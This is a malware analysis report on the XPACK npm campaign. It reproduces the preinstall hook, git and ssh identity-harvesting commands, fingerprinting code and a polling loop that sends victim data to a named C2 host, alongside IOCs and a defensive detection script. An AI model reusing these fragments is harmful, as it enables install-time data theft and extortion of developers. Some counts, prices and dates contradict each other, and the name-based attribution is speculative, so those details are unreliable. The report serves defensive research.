XPACK Malware Disguises Cryptocurrency Extortion as NPM Package Monetization
A malware campaign weaponizes npm to extort crypto payments from developers during package installation
By c0a15726-c5b1-4b0d-85e6-fe15553df9e2
The OpenSourceMalware team identified a unique malware campaign called XPACK ATTACK involving 8 malicious packages using a fake "Web3 monetization platform" to extort cryptocurrency payments from developers during npm install. The attack blocks installation until victims pay 0.1 USDC/ETH to the attacker's wallet, while collecting GitHub usernames and device fingerprints. See all the associated threat reports here.
The attacker created a fake ecosystem of "xpack" packages designed to appear as components of a legitimate npm monetization platform:
xpack-per-user - Simulates "per-user" licensing
xpack-per-device - Simulates "per-device" licensing
xpack-subscription - Simulates subscription model
xpack-sui - Simulates SUI blockchain support
xpack-arc-gateway - References Circle ARC payment gateway
This naming scheme makes the packages appear interconnected and legitimate, potentially tricking developers searching for npm monetization solutions. A developer who installs one of these packages faces immediate disruption: the installation is blocked for 5 minutes while they are pressured into a payment decision. In the background, the malware harvests their GitHub identity and records a device fingerprint.
If victims choose to pay, they suffer a financial loss ranging from 0.1 USDC (approximately $0.10) to 0.1 ETH (approximately $300), their cryptocurrency wallet address is revealed to the attacker, and the installation proceeds, though the package may contain additional malware. If they refuse to pay, the installation simply fails after wasting 5+ minutes of their development time, and they may not even realize they have encountered malware rather than what appeared to be a legitimate paywall for package access.
The Xpack attack represents an evolution in supply chain threats, combining traditional malware techniques with cryptocurrency extortion and sophisticated social engineering.
This is a coordinated campaign by a single attacker, dev.chandra_bose:
Social engineering as the attack vector
Unlike typical software supply chain malware that steals credentials or executes reverse shells, XPACK creatively abuses the HTTP 402 "Payment Required" status code to create a seemingly legitimate payment wall. The infrastructure presents itself as a professional Web3 platform for monetizing open-source software, making it difficult for victims to distinguish between malware and a genuine (albeit questionable) business model.
The attack's effectiveness relies on making extortion look like a legitimate business transaction. Several design choices support this illusion:
HTTP 402 "Payment Required"
The malware uses HTTP status code 402, which is officially reserved for "Payment Required" in the HTTP specification (RFC 7231). While rarely used in practice, this status code gives the attack an air of legitimacy: it is "official" HTTP protocol.
Professional Presentation
Every aspect of the infrastructure appears legitimate:
Modern Next.js/React website with professional design
Cryptocurrency wallet integration (MetaMask, WalletConnect)
Dashboard with analytics and project management
Marketing copy about "monetizing open source"
Support for multiple payment methods and blockchains
Plausible Business Model
The concept of "monetizing npm packages" is not entirely absurd:
GitHub Sponsors exists for open-source funding
Some developers do want to monetize their work
Cryptocurrency micropayments are a discussed solution
Private npm registries charge for access
This makes it harder for victims to immediately identify the attack as malware versus an aggressive (but legal) monetization attempt.
Domain Name Strategy
The domain hack-money-xpack.vercel.app includes "hack-money," which could suggest:
A hackathon project (many hackathons use "hack" in their names)
An ETHGlobal or similar crypto hackathon submission
A proof-of-concept or educational project
This provides cover story options if the infrastructure is investigated.
This is not an isolated incident but a coordinated malware campaign conducted by npm user dev.chandra_bose. Analysis reveals:
Campaign Statistics

| Metric | Value |
| --- | --- |
| Total Malicious Packages | 9 |
| Campaign Duration | February 4-7, 2026 (4 days) |
| Packages with Identical Malware | 6 (67%) |
| Primary C2 Domain | hack-money-xpack.vercel.app |
| Mass Deployment Window | 3 minutes (6 packages published 21:48-21:51 UTC) |
| Malware Variants | 4 distinct payloads |
Complete Package List

| Package Name | Downloads | Version | Published | Payload Size | C2 Infrastructure |
| --- | --- | --- | --- | --- | --- |
| xpack-per-user | 194 | 1.0.3 | 2026-02-07 | 22KB* | Vercel |
| xpack-per-device | 83 | 1.0.1 | 2026-02-07 | 22KB* | Vercel |
| xpack-sui | 86 | 1.0.1 | 2026-02-07 | 22KB* | Vercel |
| xpack-subscription | 82 | 1.0.1 | 2026-02-07 | 22KB* | Vercel |
| xpack-arc-gateway | 67 | 1.0.1 | 2026-02-07 | 22KB* | Vercel |
| xpack-video-submission | 0 | 1.0.10 | 2026-02-07 | 22KB* | Vercel |
| test-npm-style | 1212 | 1.0.18 | 2026-02-06 | 16.7KB | Vercel |
| xpack-subscription-test | 0 | 1.0.5 | 2026-02-04 | 7.1KB | ngrok (testing) |
| testing-package-xdsfdsfsc | 1773 | 1.0.22 | 2026-02-07 | 3KB | ngrok (testing) |

* The six packages marked 22KB* share the identical preinstall.js payload (the PRIMARY MD5 hash in the File IOCs below).
Attack Timeline
Feb 4, 2026 10:18 UTC │ xpack-subscription-test published
│ └─ Initial testing with ngrok C2
│
Feb 6, 2026 16:33 UTC │ test-npm-style published
│ └─ First production test with Vercel C2
│
Feb 7, 2026 10:15 UTC │ testing-package-xdsfdsfsc published
│ └─ Final testing with minimal payload
│
Feb 7, 2026 21:48 UTC │ ╔══ MASS DEPLOYMENT ══╗
21:48 │ ║ xpack-video-submission
21:49 │ ║ xpack-arc-gateway
21:49 │ ║ xpack-per-device
21:50 │ ║ xpack-per-user
21:50 │ ║ xpack-subscription
21:51 │ ╚═ xpack-sui
│ └─ 6 packages in 3 minutes (automated)

The 3-minute publication window for 6 identical packages strongly suggests the use of automation scripts for mass deployment.
Attack Overview (Single Package Example)
When a developer runs npm install test-npm-style (or any of the 9 malicious packages), the following attack chain executes:
1. npm executes preinstall.js hook
2. Script collects GitHub username via 4 different methods
3. Creates device fingerprint (SHA256 hash of hostname + OS)
4. Exfiltrates data to C2 server (hack-money-xpack.vercel.app)
5. Receives "402 Payment Required" response with crypto wallet
6. Displays professional-looking payment UI in terminal
7. Automatically opens browser to Web3 payment page
8. Polls C2 server every 2.5 seconds for payment confirmation
9. Blocks installation for 5 minutes waiting for payment
10. Installation fails unless cryptocurrency payment received

Technical Analysis
Initial Compromise: The Preinstall Hook
The attack begins with an innocent-looking package.json:
{
  "name": "test-npm-style",
  "version": "1.0.18",
  "scripts": {
    "preinstall": "node ./preinstall.js"
  },
  "xpack": {
    "projectId": "cml9sepu70000wzxe81w58vrh",
    "apiKey": "pay_c2e8dbf9fec1458aac4159dc740269ab",
    "host": "https://hack-money-xpack.vercel.app/"
  }
}

The preinstall script executes before any dependencies are installed, giving the malware complete control over the installation process. The xpack configuration section contains C2 credentials and server URLs.
Data Collection: GitHub Identity Extraction
One of the most sophisticated aspects of this attack is its multi-method approach to extracting the victim's GitHub identity:
Method 1: GitHub No-Reply Email
git config --global user.email
# Parses: username@users.noreply.github.com

Method 2: Single-Word Username
git config --global user.name
# Uses if matches pattern: [a-zA-Z0-9-]+

Method 3: Git Remote Origin
git remote get-url origin
# Extracts username from: github.com/username/repo

Method 4: SSH Authentication
ssh -T git@github.com
# Parses response: "Hi username! ..."

This multi-layered approach ensures high success rates in identifying victims, enabling per-user payment tracking and enforcement.
Device Fingerprinting
The malware creates a unique device identifier:
const { hostname, platform } = require("os");
const crypto = require("crypto");

function deviceFingerprint() {
  // SHA-256 of "<hostname>-<platform>", e.g. "build-host-linux"
  const raw = `${hostname()}-${platform()}`;
  return crypto.createHash("sha256").update(raw).digest("hex");
}

While relatively simple, this fingerprint allows the C2 server to track "per-device" payments and prevent the same device from being charged multiple times (or enforce it, depending on the pricing model).
C2 Communication: Payment Extortion Protocol
The C2 server implements a three-phase protocol:
Phase 1: Initial Contact
POST /api/install/start HTTP/1.1
Host: hack-money-xpack.vercel.app
Content-Type: application/json

{
  "projectId": "cml9sepu70000wzxe81w58vrh",
  "apiKey": "pay_c2e8dbf9fec1458aac4159dc740269ab",
  "version": "1.0.18",
  "deviceId": "f3e8a7b2c1d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0",
  "githubUsername": "victim-developer"
}

Response:

HTTP/1.1 402 Payment Required
Content-Type: application/json

{
  "status": "payment_required",
  "reason": "Payment required to install this package",
  "payment": {
    "price": 0.1,
    "address": "0xA9ab8933Ff0467D51d13ea2bFECD81504Fc6f15a",
    "sessionToken": "d1e1a0e662863f829d51198ad761f49dd7d2508ca2ad1ee28fe2ace530c63538",
    "instructions": "https://hack-money-xpack.vercel.app/pay?session=..."
  }
}

Phase 2: Browser-Based Payment Collection
Upon receiving the 402 response, the malware:
Displays a professional payment UI in the terminal using ANSI colors
Automatically opens the victim's browser to the payment page
The payment page is a fully functional Next.js/React application with Web3 wallet integration
The terminal output mimics legitimate npm payment services:
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
💳 PAYMENT REQUIRED
Complete payment in the browser. Install will continue automatically.
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
► PAY HERE — Open in browser or copy the link below:
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
<https://hack-money-xpack.vercel.app/pay?session=d1e1a0>...
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
Price: 0.1
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
Press ENTER to open in browser...

The payment page features:
Professional Web3 design matching legitimate crypto platforms
Wallet connection support (MetaMask, WalletConnect, etc.)
Support for multiple cryptocurrencies (USDC, ETH, SUI)
Session-based payment tracking
Blockchain payment verification
Phase 3: Payment Polling
While the browser is open, the terminal enters a polling loop:
const POLL_INTERVAL_MS = 2500; // Every 2.5 seconds
const POLL_TIMEOUT_MS = 5 * 60 * 1000; // 5 minutes total

// Re-sends the victim's deviceId/githubUsername payload to the C2 until the
// server answers "allowed" or the 5-minute budget is exhausted
// (fetch is a global in Node.js 18+).
async function pollUntilPaid(apiHost, statusPayload) {
  const start = Date.now();
  while (Date.now() - start < POLL_TIMEOUT_MS) {
    const res = await fetch(`${apiHost}/api/install/status`, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(statusPayload)
    });
    const data = await res.json();
    if (data && data.status === "allowed") return true;
    await new Promise((r) => setTimeout(r, POLL_INTERVAL_MS));
  }
  return false;
}

This results in:
120 HTTP requests over 5 minutes (if payment not made)
Continuous data exfiltration of device ID and GitHub username
Terminal displays: "Waiting for payment... (complete payment in the browser)"
Installation blocked until payment confirmed or timeout
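The two network traits described in Phase 1 and Phase 3, a 402 answer to the first POST and then a fixed 2.5-second polling cadence, are visible from the network side. The script below is an added example and is not code from the OpenSourceMalware report or from the XPACK packages. It parses a constructed egress-proxy log format (the line layout and the 10.0.0.x client addresses are made up for the demo), flags traffic to the two C2 hosts named in this report, flags a 402 response to a POST on /api/install/start, and, independently of any hostname, flags a client that POSTs to /api/install/status at roughly 2.5-second intervals. That last rule generalizes beyond the specific hosts here: it would also catch the same C2 re-hosted on a fresh Vercel or ngrok name.

```javascript
// Added example (not from the OpenSourceMalware report): spotting the XPACK
// install-gate traffic pattern in egress-proxy logs. The log format is
// constructed for this demo; adapt parseLine() to your proxy's real format.

// C2 hosts named in the report.
const KNOWN_C2_HOSTS = new Set([
  "hack-money-xpack.vercel.app",
  "4373-2401-4900-8fcd-ac9c-6c82-85aa-e5d6-be4c.ngrok-free.app",
]);
const START_PATH = "/api/install/start";
const POLL_PATH = "/api/install/status";
const EXPECTED_POLL_MS = 2500; // cadence of the malware's polling loop
const TOLERANCE_MS = 500;      // accept median gaps between 2.0s and 3.0s
const MIN_POLLS = 5;           // fewer repeats than this is not a polling loop

// Constructed format:
// "<ISO timestamp> client=<ip> method=<m> host=<h> path=<p> status=<n>"
function parseLine(line) {
  const m = /^(\S+) client=(\S+) method=(\S+) host=(\S+) path=(\S+) status=(\d+)$/.exec(line);
  if (!m) return null;
  return { ts: Date.parse(m[1]), client: m[2], method: m[3], host: m[4], path: m[5], status: Number(m[6]) };
}

function median(values) {
  const s = [...values].sort((a, b) => a - b);
  const mid = s.length >> 1;
  return s.length % 2 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

// Returns one finding object per triggered rule.
function detect(lines) {
  const findings = [];
  const seenC2 = new Set();   // one known-c2-host finding per client/host pair
  const streams = new Map();  // "client|host|path" -> request timestamps (ms)
  for (const line of lines) {
    const e = parseLine(line);
    if (!e) continue;
    const pair = `${e.client}|${e.host}`;
    if (KNOWN_C2_HOSTS.has(e.host) && !seenC2.has(pair)) {
      seenC2.add(pair);
      findings.push({ rule: "known-c2-host", client: e.client, host: e.host });
    }
    if (e.method === "POST" && e.path === START_PATH && e.status === 402) {
      findings.push({ rule: "402-on-install-start", client: e.client, host: e.host });
    }
    const key = `${pair}|${e.path}`;
    if (!streams.has(key)) streams.set(key, []);
    streams.get(key).push(e.ts);
  }
  // Cadence rule: repeated POSTs to the status endpoint ~2.5s apart, any host.
  for (const [key, stamps] of streams) {
    const [client, host, p] = key.split("|");
    if (p !== POLL_PATH || stamps.length < MIN_POLLS) continue;
    stamps.sort((a, b) => a - b);
    const gaps = stamps.slice(1).map((t, i) => t - stamps[i]);
    const med = median(gaps);
    if (Math.abs(med - EXPECTED_POLL_MS) <= TOLERANCE_MS) {
      findings.push({ rule: "payment-polling-cadence", client, host, polls: stamps.length, medianGapMs: med });
    }
  }
  return findings;
}

// Constructed sample: one workstation caught in the install gate, one doing a
// normal registry fetch from a constructed package name.
const SAMPLE_LOG = [
  "2026-02-07T21:55:00.000Z client=10.0.0.5 method=POST host=hack-money-xpack.vercel.app path=/api/install/start status=402",
  "2026-02-07T21:55:02.500Z client=10.0.0.5 method=POST host=hack-money-xpack.vercel.app path=/api/install/status status=402",
  "2026-02-07T21:55:05.000Z client=10.0.0.5 method=POST host=hack-money-xpack.vercel.app path=/api/install/status status=402",
  "2026-02-07T21:55:07.500Z client=10.0.0.5 method=POST host=hack-money-xpack.vercel.app path=/api/install/status status=402",
  "2026-02-07T21:55:10.000Z client=10.0.0.5 method=POST host=hack-money-xpack.vercel.app path=/api/install/status status=402",
  "2026-02-07T21:55:12.500Z client=10.0.0.5 method=POST host=hack-money-xpack.vercel.app path=/api/install/status status=402",
  "2026-02-07T21:55:15.000Z client=10.0.0.5 method=POST host=hack-money-xpack.vercel.app path=/api/install/status status=402",
  "2026-02-07T21:55:01.000Z client=10.0.0.9 method=GET host=registry.npmjs.org path=/example-pkg status=200",
  "2026-02-07T21:55:01.400Z client=10.0.0.9 method=GET host=registry.npmjs.org path=/example-pkg/-/example-pkg-1.0.0.tgz status=200",
];

function main() {
  for (const f of detect(SAMPLE_LOG)) console.log(JSON.stringify(f));
}
main();
```

On the sample, the script reports three findings for client 10.0.0.5 (known C2 host, the 402 on /api/install/start, and a six-request polling stream with a 2500 ms median gap) and nothing for the benign client. The cadence rule is deliberately keyed on timing rather than hostname; if the actor moves to a new subdomain, the 2.5-second loop in the preinstall script is what persists.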
Terminal Output Persistence
The malware uses an interesting technique to bypass npm's output buffering:
const fs = require("fs");

let ttyStream = null;
try {
  if (process.platform === "win32") {
    ttyStream = fs.createWriteStream("CON", { flags: "a" });      // Windows console device
  } else {
    ttyStream = fs.createWriteStream("/dev/tty", { flags: "a" }); // controlling terminal on Unix
  }
} catch (_) {
  ttyStream = null; // no terminal attached (CI, piped output): fall back silently
}

By writing directly to /dev/tty (Unix) or CON (Windows), the malware ensures its payment UI is visible even when npm buffers or suppresses script output. This makes the attack more convincing and increases the likelihood of payment.
Xpack's C2 infrastructure
The Command & Control infrastructure is hosted at hack-money-xpack.vercel.app and presents itself as a legitimate Web3 platform for npm package monetization.
The threat actors created a very slick website for this campaign:

Website Features
The C2 includes a fully functional marketing website with:
Landing Page: Professional design claiming to "Monetize your NPM packages with crypto"
Dashboard: Wallet-connected interface for managing "projects" and viewing payment analytics
Payment Page: Web3-enabled payment interface with multi-chain support
Documentation: Explains "subscription," "per-user," and "per-device" pricing models
Pricing Models Advertised
The platform claims to support four monetization models:
Subscription: Recurring payments (time-based)
Per-User: One-time payment per GitHub username
Per-Device: One-time payment per device fingerprint
One-Time: Single payment for permanent access
This gives the attacker plausible deniability: the operation can be presented as a legitimate business service rather than malware.
API Endpoints

| Endpoint | Purpose | Method |
| --- | --- | --- |
| /api/install/start | Victim registration, payment demand | POST |
| /api/install/status | Payment confirmation polling | POST |
| /pay | Browser-based payment interface | GET |
| /dashboard | Attacker's control panel | GET |
Payment Wallet
All payments are directed to a single Ethereum/EVM address:
0xA9ab8933Ff0467D51d13ea2bFECD81504Fc6f15a

Supported cryptocurrencies:
USDC (USD Coin on EVM chains)
ETH (Ethereum)
SUI (Sui blockchain native token)
Payment amount: 0.1 (approximately $0.10 USDC or $10-300+ depending on ETH/SUI price)
Data Exfiltration Summary
Per Installation Attempt

| Data Type | Source | Sensitivity |
| --- | --- | --- |
| GitHub Username | Git config / remote / SSH | HIGH - PII, tracking |
| Device Fingerprint | Hostname + OS | MEDIUM - tracking |
| Operating System | Node.js platform() | LOW - fingerprinting |
| Package Version | package.json | LOW - metadata |
| Timestamp | System time | LOW - metadata |
Network Traffic
Each installation attempt generates:
- 1 initial request to /api/install/start (victim registration)
- Up to 120 requests to /api/install/status (polling every 2.5s for 5 min)
- 1 browser request to /pay (payment page)
Total: 122 HTTPS requests to C2 infrastructure
Total data exfiltrated per victim: ~60 KB (including HTTP headers)
Indicators of Compromise (IOCs)
Network IOCs
Primary C2 Domain: hack-money-xpack.vercel.app
Secondary C2 Domain: 4373-2401-4900-8fcd-ac9c-6c82-85aa-e5d6-be4c.ngrok-free.app
URLs:
- https://hack-money-xpack.vercel.app/api/install/start
- https://hack-money-xpack.vercel.app/api/install/status
- https://hack-money-xpack.vercel.app/pay
- https://hack-money-xpack.vercel.app/dashboard
- https://4373-2401-4900-8fcd-ac9c-6c82-85aa-e5d6-be4c.ngrok-free.app/api/install/start
- https://4373-2401-4900-8fcd-ac9c-6c82-85aa-e5d6-be4c.ngrok-free.app/api/install/status

Cryptocurrency IOCs
Wallet Address: 0xA9ab8933Ff0467D51d13ea2bFECD81504Fc6f15a
Blockchain: Ethereum / EVM-compatible chains

Attacker Attribution
npm Account: dev.chandra_bose
Profile URL: https://www.npmjs.com/~dev.chandra_bose
Possible Location: India/South Asia (based on IPv6 prefix 2401:4900::/32)

File IOCs - All 9 Malicious Packages
Package Names:
- testing-package-xdsfdsfsc@1.0.22
- test-npm-style@1.0.18
- xpack-per-user@1.0.3
- xpack-per-device@1.0.1
- xpack-sui@1.0.1
- xpack-subscription@1.0.1
- xpack-arc-gateway@1.0.1
- xpack-subscription-test@1.0.5
- xpack-video-submission@1.0.10
MD5 Hashes (preinstall.js):
- 6d84e952ad198a03ec55d741924942a6 (PRIMARY - 6 packages)
- a5510900abd4e46136d113e435ca9b00 (test-npm-style)
- 54772dad022c2081272deeeb08adc126 (xpack-subscription-test)
- f14161c8fbaeba7c37d381d2cb0468c6 (testing-package-xdsfdsfsc)
Project IDs (from package.json xpack.projectId):
- cml9sepu70000wzxe81w58vrh
- cml5jzoa000014zxeq5lelhpl
- cml9cauo40000xoxexaur9rnu
- cml7thc2900006oxe682w03nj
- cml8ip17q0000xxxe2tj6lnny
- cmlc7fhc1000404jszg4xt355
API Keys (from package.json xpack.apiKey):
- pay_c2e8dbf9fec1458aac4159dc740269ab
- pay_135abcf0612547dca4ea432d89f0cdb7
- pay_c041b26bd4d240aa88b2cda39ce8eb1f
- pay_d6117e31ecf149d6bee7f9bff511198b
- pay_af44b8a9576a402a895fa3cbc9e8d85c
- pay_c7d72c0a6063452586d93fcebd99efbc

Behavioral IOCs
Preinstall script executes git commands
Automatic browser opening during package install
Network requests to vercel.app domains during installation
Terminal displays cryptocurrency payment interface
HTTP 402 "Payment Required" responses
Polling behavior (repeated HTTPS POST every 2.5 seconds)
Writes to /dev/tty or CON for direct terminal output
Executes open/start/xdg-open commands
Attribution & Context
Attacker Profile: dev.chandra_bose
npm Account: dev.chandra_bose
Profile URL: https://www.npmjs.com/~dev.chandra_bose
Geographic Indicators: Evidence points to Indian/South Asian origin:
Name: Distinctly Indian/Bengali (চন্দ্র বসু)
IPv6 Address: 2401:4900::/32 block (allocated to South Asian ISPs)
Publication Times: 10:18, 16:33, 21:48-21:51 UTC
Converts to: 15:48, 22:03, 03:18-03:21 IST (India Standard Time)
Late night/early morning pattern (common for side projects)
Technical Skill Level: Intermediate to Advanced
Proficient in JavaScript, Node.js, npm ecosystem
Familiar with Web3/blockchain (USDC, SUI, wallet integration)
Uses modern frameworks (Next.js, React, Vercel)
Capable of CI/CD automation (6 packages in 3 minutes)
Likely a Web3 developer or startup employee
Domain Analysis
Domain: hack-money-xpack.vercel.app
Hosting: Vercel (vercel.app subdomain)
Registration: Vercel subdomains are free and require no domain registration
The "hack-money" prefix suggests:
Possible hackathon origin (ETHGlobal has "hack money" themed events)
Could be proof-of-concept that was weaponized
May be malicious actor using hackathon as cover story
Vercel Account: Unknown (requires Vercel cooperation for identification)
Cryptocurrency Wallet
Address: 0xA9ab8933Ff0467D51d13ea2bFECD81504Fc6f15a
Blockchain analysis can reveal:
Total payments received
Number of victims who paid
Destination of funds (exchanges, mixers, etc.)
Transaction timestamps
Potentially linked addresses
Investigators should:
Monitor wallet for incoming transactions
Track fund movements to identify cashout methods
Report to cryptocurrency exchanges for potential freezing
Analyze transaction patterns for victim count estimation
Timeline
Package Published: Unknown (npm package may have been removed)
First Detection: 2026-02-08
C2 Infrastructure Active: Confirmed active as of analysis date
Current Status: Under investigation
Timeline of Attack
T+0s User executes: npm install test-npm-style
T+1s npm reads package.json, sees preinstall script
T+2s preinstall.js executes with Node.js
T+3s Script collects device fingerprint (SHA256 hash)
T+4s Script executes 4 git commands to extract GitHub username
T+5s Script sends HTTPS POST to hack-money-xpack.vercel.app/api/install/start
T+6s C2 returns 402 Payment Required with wallet address
T+7s Terminal displays colorized payment UI
T+8s Script automatically opens browser to payment page
T+10s Polling loop begins (HTTPS POST every 2.5 seconds)
T+12s Poll request #1 - checking for payment
T+15s Poll request #2 - still waiting
T+17s Poll request #3 - still waiting
...
T+5m Poll request #120 - timeout reached
T+5m1s Installation fails with exit code 1

If payment made at T+30s:
T+30s User connects wallet and sends 0.1 USDC to attacker
T+35s Blockchain confirms transaction
T+37s Next poll request returns: 200 OK "allowed"
T+38s Installation proceeds normally
T+45s Package fully installed (may contain additional malware)

Appendix: Payment Flow Diagram
┌─────────────────────────────────────────────────────────────┐
│ VICTIM │
├─────────────────────────────────────────────────────────────┤
│ │
│ $ npm install test-npm-style │
│ │
│ ┌──────────────────────────────────────────────────────┐ │
│ │ preinstall.js executes │ │
│ │ • Collects GitHub username (git config) │ │
│ │ • Creates device fingerprint │ │
│ │ • Contacts C2 server │ │
│ └──────────────────┬───────────────────────────────────┘ │
│ │ │
│ │ POST victim data │
│ ▼ │
│ ┌──────────────────────────────────────────────────────┐ │
│ │ C2 Server Response: 402 Payment Required │ │
│ │ Wallet: 0xA9ab8933Ff0467D51d13ea2bFECD81504Fc6f15a │ │
│ │ Amount: 0.1 USDC/ETH/SUI │ │
│ │ Session: d1e1a0e6628... │ │
│ └──────────────────┬───────────────────────────────────┘ │
│ │ │
│ ▼ │
│ ┌──────────────────────────────────────────────────────┐ │
│ │ Terminal UI │ │
│ │ ╔════════════════════════════════════════════════╗ │ │
│ │ ║ 💳 PAYMENT REQUIRED ║ │ │
│ │ ║ Price: 0.1 ║ │ │
│ │ ║ <https://hack-money-xpack.vercel.app/pay> ║ │ │
│ │ ╚════════════════════════════════════════════════╝ │ │
│ │ Press ENTER to open browser... │ │
│ └──────────────────┬───────────────────────────────────┘ │
│ │ │
│ │ Browser auto-opens │
│ ▼ │
│ ┌──────────────────────────────────────────────────────┐ │
│ │ Browser: Web3 Payment Page │ │
│ │ • Connect wallet (MetaMask) │ │
│ │ • Send 0.1 USDC to wallet │ │
│ │ • Transaction confirmed on-chain │ │
│ └──────────────────┬───────────────────────────────────┘ │
│ │ │
│ │ Payment confirmed │
│ ▼ │
│ ┌──────────────────────────────────────────────────────┐ │
│ │ Terminal: Polling Loop (every 2.5s) │ │
│ │ Waiting for payment... ▓▓▓▓▓░░░░░░░░░░░░ │ │
│ │ │ │
│ │ POST /api/install/status → 402 Still required │ │
│ │ POST /api/install/status → 402 Still required │ │
│ │ POST /api/install/status → 200 ALLOWED ✓ │ │
│ └──────────────────┬───────────────────────────────────┘ │
│ │ │
│ ▼ │
│ ┌──────────────────────────────────────────────────────┐ │
│ │ Installation proceeds │ │
│ │ ✓ test-npm-style@1.0.18 installed │ │
│ └──────────────────────────────────────────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────┐
│ ATTACKER │
├─────────────────────────────────────────────────────────────┤
│ │
│ • Receives 121+ victim data submissions │
│ • Tracks GitHub usernames + device fingerprints │
│ • Receives 0.1 USDC payment (~$0.10) │
│ • Updates database: session status = "allowed" │
│ • Can view analytics in dashboard │
│ │
└─────────────────────────────────────────────────────────────┘
